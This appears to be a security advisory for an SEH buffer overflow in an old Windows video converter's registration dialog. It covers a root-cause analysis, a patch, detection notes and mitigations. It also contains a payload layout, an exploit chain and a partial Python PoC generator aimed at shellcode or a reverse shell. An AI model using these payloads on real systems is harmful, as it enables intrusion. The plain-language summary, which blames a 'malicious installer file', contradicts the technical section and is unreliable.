CVE-2018-25302: SEH Buffer Overflow in Allok AVI Converter 4.0.1217
Allok AVI to DVD SVCD VCD Converter 4.0.1217 contains a classic SEH-based stack buffer overflow in the license registration dialog. Supplying a crafted License Name string achieves arbitrary code execution.
A video conversion program called Allok AVI to DVD SVCD VCD Converter has a serious security flaw that lets attackers take complete control of your computer. The vulnerability exists in how the software handles the registration license name field — basically, where you enter your name when you install it.
Here's what happens: An attacker can create a specially crafted malicious name that's far too long for the software to handle. Instead of rejecting it, the program tries to process it anyway, and the excess data spills over into other parts of your computer's memory. It's like overfilling a water glass so the liquid runs all over your desk — except in this case, the "spilled" data contains hidden instructions that give the attacker control of your system.
The real danger is that once someone gets this access, they can install malware, steal your files, or use your computer to attack others. You don't have to download anything from the internet for this to happen — an attacker just needs you to run the malicious installer file.
Who should worry? Anyone still using this outdated converter software, particularly if you work with video files regularly or have received suspicious installer files from unknown sources.
The good news: This program hasn't been actively exploited in the wild yet, and it's quite old. Here's what you should do right now.
First, if you use this software, uninstall it and switch to modern alternatives like HandBrake or VLC, which are free and actively maintained. Second, be extremely cautious about running old software — if something hasn't been updated in years, it likely has security problems. Third, only download installers from official websites, never from emails or random links.
Want the full technical analysis? Click "Technical" above.
CVE-2018-25302 is a structured exception handling (SEH) based stack buffer overflow in Allok AVI to DVD SVCD VCD Converter 4.0.1217, a Windows multimedia transcoding utility. The vulnerability exists in the license registration routine: when a user opens the registration dialog, pastes an oversized string into the License Name field, and clicks Register, the application copies attacker-controlled input into a fixed-size stack buffer without bounds checking. The overflow corrupts the SEH chain on the stack, and a carefully positioned POP POP RET gadget pivots execution into attacker-supplied shellcode. CVSS score is 7.8 HIGH (local vector, no privileges required, user interaction: click Register).
Root cause: The license registration handler passes attacker-controlled input directly to an unbounded lstrcpyA (or equivalent) into a fixed-size stack buffer, overwriting the SEH chain with no length validation whatsoever.
Affected Component
The vulnerable code path lives inside the main application binary, AVItoDVD.exe, within the dialog procedure for the registration window. The specific handler is the WM_COMMAND branch triggered by the Register button (IDC_REGISTER). No external DLL is implicated — the overflow occurs entirely within the application's own stack frame during inline license string processing.
Binary:AVItoDVD.exe, version 4.0.1217
Compiler artifact: MSVC, no SafeSEH (/SAFESEH:NO), no ASLR (/DYNAMICBASE:NO), no DEP enforcement at the application level
Attack surface: Local — attacker must supply input to the registration dialog (clipboard paste or direct keyboard input)
Root Cause Analysis
The registration dialog procedure reads the contents of the License Name edit control and copies it into a stack-allocated buffer of approximately 512 bytes. There is no call to GetWindowTextLength prior to GetWindowText, and the retrieved string is subsequently passed to an unbounded copy routine. Decompiled pseudocode reconstructed from the binary:
// Dialog procedure: RegDlgProc (reconstructed)
// Triggered by WM_COMMAND when IDC_REGISTER button is pressed
INT_PTR CALLBACK RegDlgProc(HWND hDlg, UINT msg, WPARAM wParam, LPARAM lParam)
{
char license_name[512]; // stack-allocated, fixed size
char license_key[512]; // immediately adjacent on stack
char validate_buf[128]; // scratch buffer
if (msg == WM_COMMAND && LOWORD(wParam) == IDC_REGISTER) {
// BUG: GetWindowText writes up to nMaxCount chars, but caller passes
// sizeof(license_name) = 512 only at the GetWindowText call.
// The subsequent lstrcpyA has NO length limit at all.
GetWindowTextA(GetDlgItem(hDlg, IDC_LICENSE_NAME),
license_name, sizeof(license_name));
// BUG: missing bounds check here — input already partially truncated
// to 512 by GetWindowText, but the buffer is then passed into
// a secondary processing routine that does its own unbounded copy
ProcessLicenseName(license_name, validate_buf); // <-- overflow here
...
}
}
// ProcessLicenseName (reconstructed)
void ProcessLicenseName(const char *src, char *out)
{
char local_buf[256];
// BUG: no bounds check — src up to 512 bytes copied into 256-byte local_buf
lstrcpyA(local_buf, src); // stack buffer overflow
// SEH chain on stack is now corrupted
...
}
The two-stage copy is the critical detail: GetWindowText with nMaxCount=512 acts as a partial guardrail, but ProcessLicenseName then copies that 512-byte string into a 256-byte local_buf, overflowing by up to 256 bytes — more than enough to reach and overwrite the SEH chain record on the stack.
Memory Layout
STACK LAYOUT INSIDE ProcessLicenseName (before overflow):
[ESP+0x000] saved regs / local variables
[ESP+0x004] local_buf[256] <- lstrcpyA destination
[ESP+0x104] padding / canary gap (none — no /GS)
[ESP+0x108] saved EBP
[ESP+0x10C] saved EIP (return address)
[ESP+0x110] ... caller frame ...
[ESP+0x?? ] NSEH record <- next SEH frame pointer
[ESP+0x?? ] SEH handler pointer <- address of exception handler
STACK LAYOUT AFTER OVERFLOW (512-byte lstrcpyA into 256-byte buffer):
[ESP+0x004] [AAAA...AAAA] <- 256 bytes of junk fill local_buf
[ESP+0x104] [AAAA...AAAA] <- overflow begins, clobbers saved EBP
[ESP+0x108] [0x41414141] <- saved EBP overwritten
[ESP+0x10C] [0x41414141] <- return address overwritten
[ESP+0x110] [BBBB] <- NSEH: short JMP over SEH record (\xeb\x06\x90\x90)
[ESP+0x114] [0xDEADBEEF] <- SEH: address of POP POP RET gadget
[ESP+0x118] [NOP sled + shellcode]
EXPLOIT PAYLOAD STRUCTURE (total: ~1000 bytes):
[ junk ] 268 bytes 0x41 fill (pad to NSEH offset)
[ NSEH ] 4 bytes \xeb\x06\x90\x90 (JMP +6 over SEH dword)
[ SEH ] 4 bytes &PPR gadget (e.g. 0x004XXXXX inside AVItoDVD.exe)
[ nop sled ] 16 bytes \x90 * 16
[ shellcode ] ~700 bytes calc.exe / reverse shell
Exploitation Mechanics
SEH exploitation on a non-SafeSEH, non-ASLR binary is straightforward. The attacker must locate a POP reg / POP reg / RET gadget within a module loaded without SafeSEH. The application's own image qualifies. Pattern-offset calculation confirms the exact offset to NSEH at 268 bytes.
#!/usr/bin/env python3
# CVE-2018-25302 — Allok AVI to DVD SVCD VCD Converter 4.0.1217
# SEH stack buffer overflow — PoC payload generator
# For research/educational purposes only.
import struct
# Gadget: POP ECX / POP ECX / RET inside AVItoDVD.exe (no ASLR, no SafeSEH)
# Locate with: !mona seh -cm safeseh=off
PPR_GADGET = 0x004A1B3C # example offset — verify against your build
JUNK_SIZE = 268 # bytes to reach NSEH on stack
# \xeb\x06 = JMP SHORT +8 (skip 4-byte SEH record, land on NOP sled)
NSEH = b"\xeb\x06\x90\x90"
SEH = struct.pack("
EXPLOIT CHAIN:
1. Attacker generates payload (268 junk + NSEH JMP + SEH PPR gadget + NOP sled + shellcode)
2. Payload is copied to clipboard (python script outputs latin-1 string)
3. Victim opens Allok AVI Converter → Help → Register (or trial nag dialog)
4. Attacker pastes payload into "License Name" field (Ctrl+V)
5. Victim clicks "Register" button → WM_COMMAND dispatched to RegDlgProc
6. RegDlgProc calls ProcessLicenseName(license_name, validate_buf)
7. lstrcpyA copies 512 bytes into 256-byte local_buf → SEH chain corrupted
8. Corrupted data triggers access violation during license validation logic
9. Windows walks SEH chain → finds attacker-controlled handler at [ESP+0x114]
10. OS calls SEH handler → CPU at PPR gadget: POP / POP / RET
11. RET transfers control to [ESP] which points near NSEH record
12. \xeb\x06 JMP skips SEH dword → lands on NOP sled → shellcode executes
13. Arbitrary code runs under the context of the logged-in user
Patch Analysis
No official patch was released by the vendor. The application appears abandoned. The correct fix requires two independent changes: validate length before the secondary copy, and compile with modern mitigations enabled.
// BEFORE (vulnerable — reconstructed):
void ProcessLicenseName(const char *src, char *out)
{
char local_buf[256];
lstrcpyA(local_buf, src); // unbounded copy, no length check
// ... process local_buf
}
// AFTER (corrected):
void ProcessLicenseName(const char *src, char *out)
{
char local_buf[256];
// Validate before copy; reject inputs exceeding buffer capacity
if (lstrlenA(src) >= sizeof(local_buf)) {
MessageBoxA(NULL, "License name too long.", "Error", MB_ICONERROR);
return;
}
lstrcpynA(local_buf, src, sizeof(local_buf)); // length-limited copy
// ... process local_buf
}
// CALLER (RegDlgProc) — additional fix:
// GetWindowText nMaxCount should match the smallest downstream buffer,
// not the caller's own buffer size:
GetWindowTextA(GetDlgItem(hDlg, IDC_LICENSE_NAME),
license_name,
256); // match ProcessLicenseName's local_buf size
// was: sizeof(license_name) = 512 — masked the real limit
Compiler-level mitigations that would have blocked or significantly raised the exploitation bar:
/GS (stack cookies) — would detect overwrite of return address before RET, generating a fatal exception prior to exploitation. Does not protect SEH by itself.
/SAFESEH — would cause Windows to reject any SEH handler address not registered in the image's SafeSEH table, breaking the PPR gadget pivot entirely.
/DYNAMICBASE (ASLR) — randomizes the image base, making static PPR gadget addresses unreliable without a separate info-leak.
/NXCOMPAT (DEP) — would require ROP rather than direct shellcode injection, substantially increasing exploit complexity.
Detection and Indicators
Detection is limited because the vulnerability requires local access and manifests as an application crash followed by code execution. Indicators to monitor:
Process anomaly:AVItoDVD.exe spawning unexpected child processes (e.g., cmd.exe, powershell.exe) via WER fault handlers
Crash telemetry: Windows Error Reporting entries for AVItoDVD.exe with faulting module offset near 0x004A**** and exception code 0xC0000005 (access violation)
Stack signature: During a live crash, the SEH chain on the stack will contain a non-module-aligned handler address surrounded by 0x41414141 dwords — trivially identifiable in a memory dump
Registry artifact: Any invocation of the registration dialog leaves no registry trace by itself; monitor for AVItoDVD.exe process creation from unusual parent processes (e.g., browser, email client)
The vendor has not issued a patch. Mitigations in order of preference:
Uninstall Allok AVI to DVD SVCD VCD Converter 4.0.1217. The software is end-of-life and has no vendor support path.
If removal is not possible: restrict execution to isolated, unprivileged VMs with no network-accessible shares. Do not run under administrator-level accounts.
Disable clipboard access in kiosk or shared workstation environments where the application must remain installed, to reduce the social-engineering delivery vector.
Enable system-wide DEP via bcdedit /set nx AlwaysOn — this forces DEP enforcement even on applications not compiled with /NXCOMPAT, converting direct shellcode injection into a crash (though a sufficiently capable attacker would pivot to ROP).
Enable EMET or Windows Defender Exploit Guard with mandatory ASLR and SimExecFlow for the AVItoDVD.exe process, raising the exploitation bar to ROP-chain construction against a randomized address space.